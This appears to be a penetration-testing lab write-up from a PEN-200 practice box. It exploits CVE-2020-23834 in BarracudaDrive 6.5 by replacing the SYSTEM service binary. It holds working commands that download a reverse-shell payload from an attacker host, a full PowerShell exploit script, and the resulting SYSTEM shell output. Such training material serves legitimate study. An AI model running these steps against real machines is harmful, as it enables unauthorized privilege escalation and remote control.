CVE-2020-23834
The target BarracudaDrive instance runs the outdated version 6.5, which is vulnerable to CVE-2020-23834.
CVE-2020-23834 is a local privilege escalation in Real Time Logic BarracudaDrive 6.5. The installation folder %SYSTEMDRIVE%\bd, which holds the service executable bd.exe, has insecure permissions, so an unprivileged local user can replace bd.exe with an arbitrary binary; the service then runs the replacement as NT AUTHORITY\SYSTEM the next time it starts. Local access is required. Exploit-DB 48789 documents the technique; no packaged exploit is needed, a drop-in replacement binary is sufficient.
Exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/medjed]
└─$ searchsploit -m windows/local/48789.txt ; mv 48789.txt CVE-2020-23834.txt
Exploit: BarracudaDrive v6.5 - Insecure Folder Permissions
URL: https://www.exploit-db.com/exploits/48789
Path: /usr/share/exploitdb/exploits/windows/local/48789.txt
Codes: N/A
Verified: False
File Type: C source, ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/medjed/48789.txt
The Exploit-DB write-up is now available locally as CVE-2020-23834.txt
Exploitation
PS C:\bd> mv bd.exe bd.exe.bak
Renaming the original service executable to bd.exe.bak so it can be restored after the engagement
PS C:\bd> iwr -Uri http://192.168.45.195/bd.exe -OutFile C:\bd\bd.exe
Transferring the replacement bd.exe (a reverse shell payload calling back to 192.168.45.195:1234) from the attacker-controlled web server into the writable C:\bd folder
PS C:\bd> shutdown /r
Rebooting the target with the current user's privileges so the service restarts and executes the replacement binary as SYSTEM (shutdown /r waits 30 seconds by default; add /t 0 for an immediate restart). The listener must be running before the reboot.
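The three manual steps above (rename, transfer, reboot) and the permission weakness described under the CVE summary, put together as one PowerShell script. This is an added example, not code from the original writeup or from Exploit-DB 48789: it first confirms that the folder ACL is actually weak and that the service runs as LocalSystem with automatic start, and only then replaces the binary. The folder path, payload URL and callback port are the values from this engagement; the service is located by matching its PathName against bd.exe rather than by name, because the service name is not shown on the page.

```powershell
# Added example (not the original writeup's or Exploit-DB 48789's code).
# Assumptions: BarracudaDrive installed in C:\bd, payload hosted at the
# attacker URL below and calling back to 192.168.45.195:1234.
$Folder   = 'C:\bd'
$Exe      = Join-Path $Folder 'bd.exe'
$Attacker = 'http://192.168.45.195/bd.exe'   # assumed payload URL

# 1. Confirm the folder grants write/modify to a low-privileged principal.
#    An Allow ACE for Users / Everyone / Authenticated Users with Write,
#    Modify or FullControl is what makes the binary replaceable.
icacls $Folder
$weak = (Get-Acl $Folder).Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    $_.IdentityReference -match 'Users|Everyone|Authenticated Users' -and
    $_.FileSystemRights -match 'Write|Modify|FullControl'
}
if (-not $weak) {
    Write-Warning "No weak ACE found on $Folder; the folder is not writable, stop here."
    return
}

# 2. Find the service that launches this binary and check that it runs as
#    LocalSystem and starts automatically, so a reboot will run our file.
$svc = Get-CimInstance Win32_Service | Where-Object { $_.PathName -like "*$Exe*" }
$svc | Select-Object Name, State, StartMode, StartName, PathName | Format-List
if ($svc.StartName -ne 'LocalSystem' -or $svc.StartMode -ne 'Auto') {
    Write-Warning 'Service is not LocalSystem/auto-start; a reboot may not yield SYSTEM.'
}

# 3. Keep the original (rename, do not delete) and drop the payload in its place.
Rename-Item -Path $Exe -NewName 'bd.exe.bak'
Invoke-WebRequest -Uri $Attacker -OutFile $Exe

# 4. Prefer a service restart (needs service-control rights on the service);
#    fall back to an immediate reboot. The nc listener on 1234 must already be up.
try {
    Restart-Service -Name $svc.Name -ErrorAction Stop
} catch {
    Write-Host 'Cannot restart the service as this user; rebooting instead.'
    shutdown /r /t 0
}
```

The ACL and service checks are the part worth keeping even on a box where the exploit is already known to work: they distinguish a folder that is merely writable from one whose binary is actually executed as SYSTEM on start, which is the condition CVE-2020-23834 relies on. Once the SYSTEM shell is in hand, restore the service with `Move-Item C:\bd\bd.exe.bak C:\bd\bd.exe -Force` and a further restart.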
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/medjed]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.156.127] 49671
Windows PowerShell running as user MEDJED$ on MEDJED
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\WINDOWS\system32> whoami
nt authority\system
PS C:\WINDOWS\system32> hostname
medjed
PS C:\WINDOWS\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.156.127
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.156.254
SYSTEM-level compromise confirmed: the reverse shell runs as nt authority\system on medjed (192.168.156.127)